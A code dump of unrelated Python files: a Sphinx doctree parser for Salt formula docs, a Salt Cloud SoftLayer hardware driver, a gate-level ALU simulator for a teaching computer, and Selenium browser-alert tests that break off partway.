keys = filter(lambda x: x.tagname == 'section', optional.children)
for key in keys:
data = {
'_errors': [],
}
default = None
# I expect the keys to be defined directly as the titles of the
# second level
titles = key.traverse(nodes.title, include_self=False)
#: rendered titles
ttitles = map(lambda x: x.astext(), titles)
assert len(ttitles) == 1, ('too many titles for '
'optional section')
name = ttitles[0]
default_sections = filter(
lambda c: (c.tagname != 'comment' and
c.astext().startswith("Default:")),
key.children)
if not default_sections:
data['_errors'].append(SyntaxError("No default sections"))
elif len(default_sections) > 1:
data['_errors'].append(
SyntaxError("There's more than one default section"))
else:
# I know default_sections is a list of 1
child, = default_sections
defaults = child.traverse(
lambda x: (x.parent == child and
isinstance(x, nodes.literal)),
include_self=False)
if not defaults:
data['_errors'].append(
SyntaxError("No default values"))
try:
default = _render(defaults[0].astext())
except Exception, e:
default = e
data['default'] = default
ret['optional'][name] = data
# find conditional
conditional_sections = filter(lambda x: (
x.tagname == 'section' and
'conditional' in x.attributes['names']), p.children)
# should be unique
if len(conditional_sections) > 1:
ret["_errors"].append(
SyntaxError("Bad number of conditional sections: %d" %
len(conditional_sections)))
for conditional in conditional_sections:
# find conditional keys
keys = filter(lambda x: x.tagname == 'section',
conditional.children)
for key in keys:
data = {
'_errors': [],
}
# I expect the keys to be defined directly as the titles of the
# second level
titles = key.traverse(nodes.title, include_self=False)
#: rendered titles
ttitles = map(lambda x: x.astext(), titles)
assert len(ttitles) == 1, ('too many titles for '
'conditional section')
name = ttitles[0]
default = None
default_sections = filter(
lambda c: (c.tagname != 'comment' and
c.astext().startswith("Default:")),
key.children)
if len(default_sections) > 1:
data['_errors'].append(
SyntaxError("There's more than one default section"))
elif default_sections:
# I know default_sections is a list of 1
child, = default_sections
defaults = child.traverse(
lambda x: (x.parent == child and
isinstance(x, nodes.literal)),
include_self=False)
if not defaults:
data['_errors'].append(
SyntaxError("No default values"))
elif len(defaults) > 1:
data['_errors'].append(
SyntaxError("Multiple default values: %s" %
" | ".join(d.astext()
for d in defaults)))
try:
default = _render(defaults[0].astext())
except Exception, e:
default = e
data['default'] = default
ret['conditional'][name] = data
return ret
def _parse_monitor(document):
from docutils import nodes
ret = {
'_errors': [],
'mandatory': [],
'optional': [],
}
if not document:
return ret
# get "monitor" sections
monitor_sections = filter(lambda x: (x.tagname == 'section' and
'monitor' in x.attributes['names']),
document.children)
# should be unique
if len(monitor_sections) != 1:
ret['_errors'].append(
SyntaxError("Bad number of Monitor sections: %d" %
len(monitor_sections)))
for m in monitor_sections:
mandatory_sections = filter(
lambda x: (x.tagname == 'section' and
'mandatory' in x.attributes['names']),
m.children)
if len(mandatory_sections) > 1:
ret['_errors'].append(
SyntaxError("Bad number of mandatory monitor sections: %d" %
len(mandatory_sections)))
for mandatory in mandatory_sections:
checks = mandatory.traverse(nodes.section, include_self=False)
# the name is the first title in each section
titles = [c.traverse(nodes.title, include_self=False)[0].astext()
for c in checks]
ret['mandatory'].extend(titles)
optional_sections = filter(lambda x: (
x.tagname == 'section' and
'optional' in x.attributes['names']), m.children)
if len(optional_sections) > 1:
ret['_errors'].append(
SyntaxError("Bad number of optional monitor sections: %d" %
len(optional_sections)))
for optional in optional_sections:
checks = optional.traverse(nodes.section, include_self=False)
# the name is the first title in each section
titles = [c.traverse(nodes.title, include_self=False)[0].astext()
for c in checks]
ret['optional'].extend(titles)
return ret
def _example_pillars(parsed_doctree):
"""
Returns a list of pillar dictionaries as they have been documented in
doc/pillar.rst
:param parsed_doctree: the return value of :func:`parse_doctrees`
"""
ret = []
for fdata in parsed_doctree.itervalues():
# this supports each mandatory section having more than one example
# although it is reported as an error elsewhere
ret.extend(fdata['mandatory']['examples'])
return ret
def parse_doctrees(docs_dir):
'''
Parse sphinx doctrees
    :param docs_dir: path of the directory containing the Sphinx documentation sources
:return: a dictionary
like::
{
formula: {
<structure documented in _parse_pillar()>
'_monitor': _parse_monitor()
}
}
'''
ret = {}
doctrees = _get_doctrees(docs_dir)
for name, (pillar, monitor) in doctrees.iteritems():
try:
if name != 'common':
ret[name] = _parse_pillar(pillar)
else:
ret[name] = _parse_pillar(pillar, root_name='global pillar')
except Exception, e:
ret[name] = {'_errors': [e]}
try:
# HACK, TODO:
# it should really be ret = { 'pillar': parse_pillar,
# 'monitor': parse_monitor}
# but that means changes in several places now.
ret[name]['_monitor'] = _parse_monitor(monitor)
except Exception, e:
ret[name]['_monitor'] = {'_errors': [e], 'checks': []}
return ret
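# A usage sketch (not part of the original module; assumes the formula docs are
# Sphinx sources living under a ``doc/`` directory as referenced above):
#
#     parsed = parse_doctrees('doc')
#     for formula, data in parsed.iteritems():
#         print formula, data.get('_errors'), data['_monitor'].get('mandatory')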
|
|
# -*- coding: utf-8 -*-
'''
SoftLayer HW Cloud Module
=========================
The SoftLayer HW cloud module is used to control access to the SoftLayer
hardware cloud system.
Use of this module only requires the ``apikey`` parameter. Set up the cloud
configuration at:
``/etc/salt/cloud.providers`` or ``/etc/salt/cloud.providers.d/softlayer.conf``:
.. code-block:: yaml
my-softlayer-config:
# SoftLayer account api key
user: MYLOGIN
apikey: JVkbSJDGHSDKUKSDJfhsdklfjgsjdkflhjlsdfffhgdgjkenrtuinv
driver: softlayer_hw
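A corresponding profile sketch (not part of the original documentation; the
numeric ids below are illustrative only -- query the real price ids for your
account with ``--list-sizes``, ``--list-images`` and the ``show_all_prices``
function):
.. code-block:: yaml
    my-softlayer-hw-profile:
      provider: my-softlayer-config
      domain: example.com
      # price ids, e.g. 1921: 2 x 2.0 GHz Core Bare Metal Instance - 2 GB Ram
      size: 1921
      # e.g. 19: 250GB SATA II
      hdd: 19
      # e.g. 13963: CentOS 6.0 - Minimal Install (64 bit)
      image: 13963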
The SoftLayer Python Library needs to be installed in order to use the
SoftLayer salt.cloud modules. See: https://pypi.python.org/pypi/SoftLayer
:depends: softlayer
'''
# Import python libs
from __future__ import absolute_import
import logging
import time
import decimal
# Import salt cloud libs
import salt.utils.cloud
import salt.config as config
from salt.exceptions import SaltCloudSystemExit
# Attempt to import softlayer lib
try:
import SoftLayer
HAS_SLLIBS = True
except ImportError:
HAS_SLLIBS = False
# Get logging started
log = logging.getLogger(__name__)
__virtualname__ = 'softlayer_hw'
# Only load in this module if the SoftLayer configurations are in place
def __virtual__():
'''
Check for SoftLayer configurations.
'''
if get_configured_provider() is False:
return False
if get_dependencies() is False:
return False
return __virtualname__
def get_configured_provider():
'''
Return the first configured instance.
'''
return config.is_provider_configured(
__opts__,
__active_provider_name__ or __virtualname__,
('apikey',)
)
def get_dependencies():
'''
Warn if dependencies aren't met.
'''
return config.check_driver_dependencies(
__virtualname__,
{'softlayer': HAS_SLLIBS}
)
def script(vm_):
'''
Return the script deployment object
'''
deploy_script = salt.utils.cloud.os_script(
config.get_cloud_config_value('script', vm_, __opts__),
vm_,
__opts__,
salt.utils.cloud.salt_config_to_yaml(
salt.utils.cloud.minion_config(__opts__, vm_)
)
)
return deploy_script
def get_conn(service='SoftLayer_Hardware'):
'''
Return a conn object for the passed VM data
'''
client = SoftLayer.Client(
username=config.get_cloud_config_value(
'user', get_configured_provider(), __opts__, search_global=False
),
api_key=config.get_cloud_config_value(
'apikey', get_configured_provider(), __opts__, search_global=False
),
)
return client[service]
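# Usage note (sketch): the ``service`` argument selects which SoftLayer API
# service the returned client is bound to; the functions below use, e.g.,
#     get_conn(service='SoftLayer_Product_Package')   # catalog/pricing calls
#     get_conn(service='SoftLayer_Product_Order')     # placing orders
#     get_conn(service='SoftLayer_Account')           # account/hardware queries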
def avail_locations(call=None):
'''
List all available locations
'''
if call == 'action':
raise SaltCloudSystemExit(
'The avail_locations function must be called with '
'-f or --function, or with the --list-locations option'
)
ret = {}
conn = get_conn(service='SoftLayer_Product_Package')
locations = conn.getLocations(id=50)
for location in locations:
ret[location['id']] = {
'id': location['id'],
'name': location['name'],
'location': location['longName'],
}
available = conn.getAvailableLocations(id=50)
for location in available:
        if location.get('isAvailable', 0) == 0:
continue
ret[location['locationId']]['available'] = True
return ret
def avail_sizes(call=None):
'''
    Return a dict of all available server sizes on the cloud provider, keyed
    by price id, with the relevant item data for each size.
'''
if call == 'action':
raise SaltCloudSystemExit(
'The avail_sizes function must be called with '
'-f or --function, or with the --list-sizes option'
)
ret = {}
conn = get_conn(service='SoftLayer_Product_Package')
for category in conn.getCategories(id=50):
if category['categoryCode'] != 'server_core':
continue
for group in category['groups']:
for price in group['prices']:
ret[price['id']] = price['item'].copy()
del ret[price['id']]['id']
return ret
def avail_images(call=None):
'''
Return a dict of all available VM images on the cloud provider.
'''
if call == 'action':
raise SaltCloudSystemExit(
'The avail_images function must be called with '
'-f or --function, or with the --list-images option'
)
ret = {}
conn = get_conn(service='SoftLayer_Product_Package')
for category in conn.getCategories(id=50):
if category['categoryCode'] != 'os':
continue
for group in category['groups']:
for price in group['prices']:
ret[price['id']] = price['item'].copy()
del ret[price['id']]['id']
return ret
def get_location(vm_=None):
'''
Return the location to use, in this order:
- CLI parameter
- VM parameter
- Cloud profile setting
'''
return __opts__.get(
'location',
config.get_cloud_config_value(
'location',
vm_ or get_configured_provider(),
__opts__,
#default=DEFAULT_LOCATION,
search_global=False
)
)
def create(vm_):
'''
Create a single VM from a data dict
'''
try:
# Check for required profile parameters before sending any API calls.
if vm_['profile'] and config.is_profile_configured(__opts__,
__active_provider_name__ or 'softlayer_hw',
vm_['profile'],
vm_=vm_) is False:
return False
except AttributeError:
pass
# Since using "provider: <provider-engine>" is deprecated, alias provider
# to use driver: "driver: <provider-engine>"
if 'provider' in vm_:
vm_['driver'] = vm_.pop('provider')
name = vm_['name']
hostname = name
domain = config.get_cloud_config_value(
'domain', vm_, __opts__, default=None
)
if domain is None:
        raise SaltCloudSystemExit(
'A domain name is required for the SoftLayer driver.'
)
if vm_.get('use_fqdn'):
name = '.'.join([name, domain])
vm_['name'] = name
__utils__['cloud.fire_event'](
'event',
'starting create',
'salt/cloud/{0}/creating'.format(name),
{
'name': name,
'profile': vm_['profile'],
'provider': vm_['driver'],
},
transport=__opts__['transport']
)
log.info('Creating Cloud VM {0}'.format(name))
conn = get_conn(service='SoftLayer_Product_Order')
kwargs = {
'complexType': 'SoftLayer_Container_Product_Order_Hardware_Server',
'quantity': 1,
'hardware': [{
'hostname': hostname,
'domain': domain,
}],
# Baremetal Package
'packageId': 50,
'prices': [
# Size Ex: 1921: 2 x 2.0 GHz Core Bare Metal Instance - 2 GB Ram
{'id': vm_['size']},
# HDD Ex: 19: 250GB SATA II
{'id': vm_['hdd']},
# Image Ex: 13963: CentOS 6.0 - Minimal Install (64 bit)
{'id': vm_['image']},
# The following items are currently required
# Reboot / Remote Console
{'id': '905'},
# 1 IP Address
{'id': '21'},
# Host Ping Monitoring
{'id': '55'},
# Email and Ticket Notifications
{'id': '57'},
# Automated Notification Response
{'id': '58'},
# Unlimited SSL VPN Users & 1 PPTP VPN User per account
{'id': '420'},
# Nessus Vulnerability Assessment & Reporting
{'id': '418'},
],
}
optional_products = config.get_cloud_config_value(
'optional_products', vm_, __opts__, default=[]
)
for product in optional_products:
kwargs['prices'].append({'id': product})
# Default is 273 (100 Mbps Public & Private Networks)
port_speed = config.get_cloud_config_value(
'port_speed', vm_, __opts__, default=273
)
kwargs['prices'].append({'id': port_speed})
# Default is 1800 (0 GB Bandwidth)
bandwidth = config.get_cloud_config_value(
'bandwidth', vm_, __opts__, default=1800
)
kwargs['prices'].append({'id': bandwidth})
post_uri = config.get_cloud_config_value(
'post_uri', vm_, __opts__, default=None
)
if post_uri:
kwargs['prices'].append({'id': post_uri})
vlan_id = config.get_cloud_config_value(
'vlan', vm_, __opts__, default=False
)
if vlan_id:
kwargs['primaryNetworkComponent'] = {
'networkVlan': {
'id': vlan_id,
}
}
location = get_location(vm_)
if location:
kwargs['location'] = location
__utils__['cloud.fire_event'](
'event',
'requesting instance',
'salt/cloud/{0}/requesting'.format(name),
{'kwargs': kwargs},
transport=__opts__['transport']
)
try:
response = conn.placeOrder(kwargs)
# Leaving the following line in, commented, for easy debugging
#response = conn.verifyOrder(kwargs)
except Exception as exc:
log.error(
'Error creating {0} on SoftLayer\n\n'
'The following exception was thrown when trying to '
'run the initial deployment: \n{1}'.format(
name, str(exc)
),
# Show the traceback if the debug logging level is enabled
exc_info_on_loglevel=logging.DEBUG
)
return False
def wait_for_ip():
'''
Wait for the IP address to become available
'''
nodes = list_nodes_full()
if 'primaryIpAddress' in nodes[hostname]:
return nodes[hostname]['primaryIpAddress']
time.sleep(1)
return False
ip_address = salt.utils.cloud.wait_for_fun(
wait_for_ip,
timeout=config.get_cloud_config_value(
'wait_for_fun_timeout', vm_, __opts__, default=15 * 60),
)
ssh_connect_timeout = config.get_cloud_config_value(
# 15 minutes
'ssh_connect_timeout', vm_, __opts__, 900
)
if not salt.utils.cloud.wait_for_port(ip_address,
timeout=ssh_connect_timeout):
raise SaltCloudSystemExit(
'Failed to authenticate against remote ssh'
)
pass_conn = get_conn(service='SoftLayer_Account')
mask = {
'virtualGuests': {
'powerState': '',
'operatingSystem': {
'passwords': ''
},
},
}
def get_passwd():
'''
Wait for the password to become available
'''
node_info = pass_conn.getVirtualGuests(id=response['id'], mask=mask)
for node in node_info:
if node['id'] == response['id'] \
and 'passwords' in node['operatingSystem'] \
and len(node['operatingSystem']['passwords']) > 0:
return node['operatingSystem']['passwords'][0]['password']
time.sleep(5)
return False
passwd = salt.utils.cloud.wait_for_fun(
get_passwd,
timeout=config.get_cloud_config_value(
'wait_for_fun_timeout', vm_, __opts__, default=15 * 60),
)
response['password'] = passwd
response['public_ip'] = ip_address
ssh_username = config.get_cloud_config_value(
'ssh_username', vm_, __opts__, default='root'
)
vm_['ssh_host'] = ip_address
vm_['password'] = passwd
ret = __utils__['cloud.bootstrap'](vm_, __opts__)
ret.update(response)
__utils__['cloud.fire_event'](
'event',
'created instance',
'salt/cloud/{0}/created'.format(name),
{
'name': name,
'profile': vm_['profile'],
'provider': vm_['driver'],
},
transport=__opts__['transport']
)
return ret
def list_nodes_full(mask='mask[id, hostname, primaryIpAddress, \
primaryBackendIpAddress, processorPhysicalCoreAmount, memoryCount]',
call=None):
'''
Return a list of the VMs that are on the provider
'''
if call == 'action':
raise SaltCloudSystemExit(
'The list_nodes_full function must be called with -f or --function.'
)
ret = {}
conn = get_conn(service='SoftLayer_Account')
response = conn.getHardware(mask=mask)
for node in response:
ret[node['hostname']] = node
__utils__['cloud.cache_node_list'](ret, __active_provider_name__.split(':')[0], __opts__)
return ret
def list_nodes(call=None):
'''
Return a list of the VMs that are on the provider
'''
if call == 'action':
raise SaltCloudSystemExit(
'The list_nodes function must be called with -f or --function.'
)
ret = {}
nodes = list_nodes_full()
if 'error' in nodes:
raise SaltCloudSystemExit(
'An error occurred while listing nodes: {0}'.format(
nodes['error']['Errors']['Error']['Message']
)
)
for node in nodes:
ret[node] = {
'id': nodes[node]['hostname'],
'ram': nodes[node]['memoryCount'],
'cpus': nodes[node]['processorPhysicalCoreAmount'],
}
if 'primaryIpAddress' in nodes[node]:
ret[node]['public_ips'] = nodes[node]['primaryIpAddress']
if 'primaryBackendIpAddress' in nodes[node]:
ret[node]['private_ips'] = nodes[node]['primaryBackendIpAddress']
return ret
def list_nodes_select(call=None):
'''
Return a list of the VMs that are on the provider, with select fields
'''
return salt.utils.cloud.list_nodes_select(
list_nodes_full(), __opts__['query.selection'], call,
)
def show_instance(name, call=None):
'''
Show the details from SoftLayer concerning a guest
'''
if call != 'action':
raise SaltCloudSystemExit(
'The show_instance action must be called with -a or --action.'
)
nodes = list_nodes_full()
__utils__['cloud.cache_node'](nodes[name], __active_provider_name__, __opts__)
return nodes[name]
def destroy(name, call=None):
'''
Destroy a node.
CLI Example:
.. code-block:: bash
salt-cloud --destroy mymachine
'''
if call == 'function':
raise SaltCloudSystemExit(
'The destroy action must be called with -d, --destroy, '
'-a or --action.'
)
__utils__['cloud.fire_event'](
'event',
'destroying instance',
'salt/cloud/{0}/destroying'.format(name),
{'name': name},
transport=__opts__['transport']
)
# If the VM was created with use_fqdn, the short hostname will be used instead.
name = name.split('.')[0]
node = show_instance(name, call='action')
conn = get_conn(service='SoftLayer_Ticket')
response = conn.createCancelServerTicket(
{
'id': node['id'],
'reason': 'Salt Cloud Hardware Server Cancellation',
'content': 'Please cancel this server',
'cancelAssociatedItems': True,
'attachmentType': 'HARDWARE',
}
)
__utils__['cloud.fire_event'](
'event',
'destroyed instance',
'salt/cloud/{0}/destroyed'.format(name),
{'name': name},
transport=__opts__['transport']
)
if __opts__.get('update_cachedir', False) is True:
__utils__['cloud.delete_minion_cachedir'](name, __active_provider_name__.split(':')[0], __opts__)
return response
def list_vlans(call=None):
'''
List all VLANs associated with the account
'''
if call != 'function':
raise SaltCloudSystemExit(
'The list_vlans function must be called with -f or --function.'
)
conn = get_conn(service='SoftLayer_Account')
return conn.getNetworkVlans()
def show_pricing(kwargs=None, call=None):
'''
Show pricing for a particular profile. This is only an estimate, based on
unofficial pricing sources.
CLI Examples:
.. code-block:: bash
salt-cloud -f show_pricing my-softlayerhw-config profile=my-profile
If pricing sources have not been cached, they will be downloaded. Once they
have been cached, they will not be updated automatically. To manually update
all prices, use the following command:
.. code-block:: bash
salt-cloud -f update_pricing <provider>
.. versionadded:: 2015.8.0
'''
profile = __opts__['profiles'].get(kwargs['profile'], {})
if not profile:
return {'Error': 'The requested profile was not found'}
# Make sure the profile belongs to Softlayer HW
provider = profile.get('provider', '0:0')
comps = provider.split(':')
if len(comps) < 2 or comps[1] != 'softlayer_hw':
return {'Error': 'The requested profile does not belong to Softlayer HW'}
raw = {}
ret = {}
ret['per_hour'] = 0
conn = get_conn(service='SoftLayer_Product_Item_Price')
for item in profile:
if item in ('profile', 'provider', 'location'):
continue
price = conn.getObject(id=profile[item])
raw[item] = price
ret['per_hour'] += decimal.Decimal(price.get('hourlyRecurringFee', 0))
ret['per_day'] = ret['per_hour'] * 24
ret['per_week'] = ret['per_day'] * 7
ret['per_month'] = ret['per_day'] * 30
ret['per_year'] = ret['per_week'] * 52
if kwargs.get('raw', False):
ret['_raw'] = raw
return {profile['profile']: ret}
def show_all_prices(call=None, kwargs=None):
'''
Return a dict of all prices on the cloud provider.
'''
if call == 'action':
raise SaltCloudSystemExit(
'The show_all_prices function must be called with -f or --function.'
)
if kwargs is None:
kwargs = {}
conn = get_conn(service='SoftLayer_Product_Package')
if 'code' not in kwargs:
return conn.getCategories(id=50)
ret = {}
for category in conn.getCategories(id=50):
if category['categoryCode'] != kwargs['code']:
continue
for group in category['groups']:
for price in group['prices']:
ret[price['id']] = price['item'].copy()
del ret[price['id']]['id']
return ret
def show_all_categories(call=None):
'''
Return a dict of all available categories on the cloud provider.
.. versionadded:: 2016.3.0
'''
if call == 'action':
raise SaltCloudSystemExit(
'The show_all_categories function must be called with -f or --function.'
)
conn = get_conn(service='SoftLayer_Product_Package')
categories = []
for category in conn.getCategories(id=50):
categories.append(category['categoryCode'])
return {'category_codes': categories}
|
|
'''----------------------------- Imports -----------------------------'''
# Built ins
import math
# Hack computer
from ._x__components import *
'''----------------------------- Helpers -----------------------------'''
def zeroN_( N ):
return ( 0, ) * N
def oneN_( N ):
return ( 0, ) * ( N - 1 ) + ( 1, )
def isZeroN_( N, x ):
return not_( orNto1_( N, x ) )
def isNegative_( x ):
# Twos complement, MSB is one if negative
return x[ 0 ]
'''----------------------------- Adders -----------------------------'''
# MSB to LSB
def halfAdder_( a, b ):
summ = xor_( a, b )
carry = and_( a, b )
return ( summ, carry )
def fullAdder_( a, b, cIn ):
summ1, carry1 = halfAdder_( a, b )
summ2, carry2 = halfAdder_( summ1, cIn )
cOut = or_( carry1, carry2 )
return ( summ2, cOut )
def rippleCarryAdderN_( N, a, b ):
''' N bit ripple adder '''
summ = [ None ] * N
carry = 0
for i in range( N - 1, - 1, - 1 ): # (N - 1)..0, R to L
summ[i], carry = fullAdder_( a[i], b[i], carry )
return summ
def addN_( N, a, b ):
return rippleCarryAdderN_( N, a, b )
def incrementN_( N, x ):
''' Add one '''
# Use addN_ --
# return addN_( N, x, oneN_( N ) )
# Use shortcut --
# return fastIncrement_( x )
# Use cascaded half adders --
summ = [ None ] * N
carry = 1 # add one
for i in range ( N - 1, - 1, - 1 ): # (N - 1)..0, R to L
summ[i], carry = halfAdder_( x[i], carry )
return summ
def fastIncrement_( x ):
''' Keep flipping RtoL till flip a zero '''
# Is this implementable with logic gates? See vid 2.3
# Doubt it atm due to break-statement
x = list( x ) # mutable
for i in range ( len( x ) - 1, - 1, - 1 ): # RtoL
x[i] = not_( x[i] )
if x[i] == 1: # flipped a zero
break
return tuple( x )
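# Worked example (comment only; assumes the gate primitives imported above):
# incrementing the 4-bit value 0111 (7) with incrementN_ ripples the carry
# through the trailing 1s and yields 1000 (8); incrementing 1111 (15) wraps
# around to 0000.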
'''--------------------------- Subtractors ---------------------------'''
# MSB to LSB
def halfSubtractor_( a, b ):
# a - b
diff = xor_( a, b )
borrow = and_( not_( a ), b )
return ( diff, borrow )
def fullSubtractor_( a, b, c ):
# c is the borrow bit from the previous circuit
diff1, borrow1 = halfSubtractor_( a, b )
diff2, borrow2 = halfSubtractor_( diff1, c )
borrow = or_( borrow1, borrow2 )
return ( diff2, borrow )
def subtractN_( N, a, b ):
	''' N bit subtractor, takes and outputs N-bit numbers
	    if a < b, the answer returned is in 2s complement
'''
diff = [ None ] * N
borrow = 0
for i in range( N - 1, - 1, - 1 ): # (N - 1)..0, R to L
diff[i], borrow = fullSubtractor_( a[i], b[i], borrow )
return diff
def subtractN_v2_( N, a, b ):
''' 2s complement addition
ex. 7 - 5 = 7 + (-5) = 7 + (2**n - 5)
'''
b_2s = negateN_( N, b ) # 2s complement
return addN_( N, a, b_2s )
'''--------------------------- Negation ---------------------------'''
# MSB to LSB
def negateN_( N, x ):
''' 2s complement -> -x = 2^n - x = ( 2^n - 1 ) - x + 1 '''
## ( 2^n - 1 ) - x aka flip x's bits
temp = tuple( not_( b ) for b in x )
## Add 1
return incrementN_( N, temp )
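# Worked example (comment only): negating the 4-bit value 0011 (+3) flips the
# bits to 1100 and adds one, giving 1101, i.e. -3 in two's complement
# (2^4 - 3 = 13 = 0b1101).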
'''------------------------- Shift Registers -------------------------'''
# MSB to LSB
def shiftRightN_( N, x, y ):
''' N bit barrel shifter (right) '''
ns = int( math.log( N , 2 ) ) # number of shift bits
t = []
for i in range( ns ):
t.append( [ None ] * N )
for j in range( ns ):
p2 = 2 ** j
h = x if j == 0 else t[ j - 1 ]
y_idx = N - j - 1
for i in range( N - 1, p2 - 1, - 1 ):
t[ j ][ i ] = mux_( h[ i - p2 ], h[ i ], y[ y_idx ] )
for k in range( p2 - 1, - 1, - 1 ):
t[ j ][ k ] = mux_( 0, h[ k ], y[ y_idx ] )
return t[ ns - 1 ]
def shiftLeftN_( N, x, y ):
''' N bit barrel shifter (left) '''
ns = int( math.log( N , 2 ) ) # number of shift bits
t = []
for i in range( ns ):
t.append( [ None ] * N )
for j in range ( ns ):
p2 = 2 ** j
h = x if j == 0 else t[ j - 1 ]
y_idx = N - j - 1
for k in range( N - 1, N - 1 - p2 , - 1 ):
t[ j ][ k ] = mux_( 0, h[ k ], y[ y_idx ] )
for i in range( N - 1 - p2, - 1, - 1 ):
t[ j ][ i ] = mux_( h[ i + p2 ], h[ i ], y[ y_idx ] )
return t[ ns - 1 ]
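# Worked example (comment only): the shift amount is read from the low
# log2(N) bits of y (y[N-1] is the 1s place). For N = 8, x = 10110100 and
# y = 00000011 (shift by 3):
#     shiftRightN_ -> 00010110   (zero-filled logical shift right)
#     shiftLeftN_  -> 10100000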
'''--------------------- Arithmetic Logic Unit ---------------------'''
# MSB to LSB
def ALU_( N, x, y, control ):
''' N bit ALU '''
'''
fx
0 - add
1 - and
2 - xor
3 - lsr
4 - lsl
5 - mul
6 - div
7 - fpAdd
8 - fpSub
9 - fpMul
10 - fpDiv
lookup ROM
op fsel flags composite
----- ---- ----- ----------
0 add zx, zy 0000 10100
1 add zx, nx, zy, ny, no 0000 11111
- 1 add zx, nx, zy 0000 11100
x and zy, ny 0001 00110
! x and zy, ny, no 0001 00111
- x add zy, ny, no 0000 00111
x + 1 add nx, zy, ny, no 0000 01111
x - 1 add zy, ny 0000 00110
x + y add 0000 00000
x - y add nx, no 0000 01001
x & y and 0001 00000
x | y and nx, ny, no 0001 01011
x ^ y xor 0010 00000
x >> y lsr 0011 00000
x << y lsl 0100 00000
x * y mul 0101 00000
x / y div 0110 00000
'''
# decode
fx = control[ 0 : 4 ]
zx = control[ 4 ]
nx = control[ 5 ]
zy = control[ 6 ]
ny = control[ 7 ]
no = control[ 8 ]
# constants, not, negate, and, or, add, sub
x0 = muxN_( N, zeroN_( N ), x, zx )
x0 = muxN_( N, notN_( N, x0 ), x0, nx )
y0 = muxN_( N, zeroN_( N ), y, zy )
y0 = muxN_( N, notN_( N, y0 ), y0, ny )
z0 = addN_( N, x0, y0 )
z0 = muxN_( N, notN_( N, z0 ), z0, no )
z1 = andN_( N, x0, y0 )
z1 = muxN_( N, notN_( N, z1 ), z1, no )
# xor
z2 = xorN_( N, x, y )
# logical shift
z3 = shiftRightN_( N, x, y )
z4 = shiftLeftN_( N, x, y )
# Select output
out = muxN16to1_(
N,
zeroN_( N ),
zeroN_( N ),
zeroN_( N ),
zeroN_( N ),
zeroN_( N ),
zeroN_( N ),
zeroN_( N ),
zeroN_( N ),
zeroN_( N ),
zeroN_( N ),
zeroN_( N ),
z4,
z3,
z2,
z1,
z0,
fx[ 0 ], fx[ 1 ], fx[ 2 ], fx[ 3 ]
)
out_zr = mux_( 1, 0, isZeroN_( N, out ) )
out_ng = mux_( 1, 0, isNegative_( out ) )
return ( out, out_zr, out_ng )
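# Example control words (comment only), read straight from the lookup ROM above;
# control[0:4] selects the function and control[4:9] is (zx, nx, zy, ny, no):
#     x + y : fx=0000 (add), no flags -> control = (0,0,0,0, 0,0,0,0,0)
#     x - y : fx=0000 (add), nx, no   -> control = (0,0,0,0, 0,1,0,0,1)
#     x & y : fx=0001 (and), no flags -> control = (0,0,0,1, 0,0,0,0,0)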
|
|
# Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import pytest
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.wait import WebDriverWait
from selenium.common.exceptions import ElementNotVisibleException
from selenium.common.exceptions import InvalidElementStateException
from selenium.common.exceptions import NoAlertPresentException
from selenium.common.exceptions import UnexpectedAlertPresentException
import unittest
class AlertsTest(unittest.TestCase):
def testShouldBeAbleToOverrideTheWindowAlertMethod(self):
if self.driver.capabilities['browserName'] == 'phantomjs':
pytest.xfail("phantomjs driver does not support alerts")
self._loadPage("alerts")
self.driver.execute_script(
"window.alert = function(msg) { document.getElementById('text').innerHTML = msg; }")
self.driver.find_element(by=By.ID, value="alert").click()
try:
self.assertEqual(self.driver.find_element_by_id('text').text, "cheese")
except Exception as e:
# if we're here, likely the alert is displayed
# not dismissing it will affect other tests
try:
self._waitForAlert().dismiss()
except Exception:
pass
raise e
def testShouldAllowUsersToAcceptAnAlertManually(self):
if self.driver.capabilities['browserName'] == 'phantomjs':
pytest.xfail("phantomjs driver does not support alerts")
self._loadPage("alerts")
self.driver.find_element(by=By.ID, value="alert").click()
alert = self._waitForAlert()
alert.accept()
# If we can perform any action, we're good to go
self.assertEqual("Testing Alerts", self.driver.title)
def testShouldAllowUsersToAcceptAnAlertWithNoTextManually(self):
if self.driver.capabilities['browserName'] == 'phantomjs':
pytest.xfail("phantomjs driver does not support alerts")
self._loadPage("alerts")
        self.driver.find_element(By.ID, "empty-alert").click()
alert = self._waitForAlert()
alert.accept()
# If we can perform any action, we're good to go
self.assertEqual("Testing Alerts", self.driver.title)
def testShouldGetTextOfAlertOpenedInSetTimeout(self):
if self.driver.capabilities['browserName'] == 'phantomjs':
pytest.xfail("phantomjs driver does not support alerts")
self._loadPage("alerts")
self.driver.find_element_by_id("slow-alert").click()
# DO NOT WAIT OR SLEEP HERE
# This is a regression test for a bug where only the first switchTo call would throw,
# and only if it happens before the alert actually loads.
alert = self._waitForAlert()
try:
self.assertEqual("Slow", alert.text)
finally:
alert.accept()
@pytest.mark.ignore_chrome
def testShouldAllowUsersToDismissAnAlertManually(self):
if self.driver.capabilities['browserName'] == 'phantomjs':
pytest.xfail("phantomjs driver does not support alerts")
self._loadPage("alerts")
self.driver.find_element(by=By.ID, value="alert").click()
alert = self._waitForAlert()
alert.dismiss()
# If we can perform any action, we're good to go
self.assertEqual("Testing Alerts", self.driver.title)
def testShouldAllowAUserToAcceptAPrompt(self):
if self.driver.capabilities['browserName'] == 'phantomjs':
pytest.xfail("phantomjs driver does not support alerts")
self._loadPage("alerts")
self.driver.find_element(by=By.ID, value="prompt").click()
alert = self._waitForAlert()
alert.accept()
# If we can perform any action, we're good to go
self.assertEqual("Testing Alerts", self.driver.title)
def testShouldAllowAUserToDismissAPrompt(self):
if self.driver.capabilities['browserName'] == 'phantomjs':
pytest.xfail("phantomjs driver does not support alerts")
self._loadPage("alerts")
self.driver.find_element(by=By.ID, value="prompt").click()
alert = self._waitForAlert()
alert.dismiss()
# If we can perform any action, we're good to go
self.assertEqual("Testing Alerts", self.driver.title)
def testShouldAllowAUserToSetTheValueOfAPrompt(self):
